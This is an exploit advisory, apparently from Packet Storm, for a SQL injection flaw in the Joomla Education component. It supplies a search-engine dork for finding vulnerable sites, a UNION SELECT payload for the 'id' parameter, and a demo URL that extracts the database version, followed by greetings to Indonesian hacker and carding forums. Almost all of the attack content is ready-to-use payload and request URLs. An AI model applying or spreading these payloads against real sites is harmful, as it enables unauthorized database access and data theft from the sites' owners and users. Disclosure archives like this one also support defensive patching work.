The Joomla Education component suffers from a remote SQL injection vulnerability.
a2a04ca0855692c1f08ae9d3de1cce4d47c56f7211d46c871107fe45a71b390a# Exploit Title: joomla component education SQL injection Vulnerability
# Author: bumble_be
# Software Link: N/A
# Tested on: Windows XP 2
======================================================================
[x] author : bumble_be (iogi89@ymail.com)
[x] dork : inurl:option=com_education_classes
[x] myweb : http://linggau-haxor.com
======================================================================
==== SQLI EXPLOIT ====
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
==== VULN IN HERE ====
http://localhost/xampp/joomla/index.php?option=com_education_classess&task=showEvents&id=11[c0de]
==== LIVE DEMO ====
http://localhost/xampp/joomla/index.php?option=com_education_classes&task=showEvents&id=11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
[x]-------------------------------------------------------------------
GREETZ TO WE FORUM:
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID
[x]-------------------------------------------------------------------
MY BROTHA :
mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker
[x]-------------------------------------------------------------------
note :mulailah sesuatu dengan ucapan bissmillah
[X]-------------------------------------------------------------------
INDONESIA STILL UP AND WE NOT DEAD :0
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed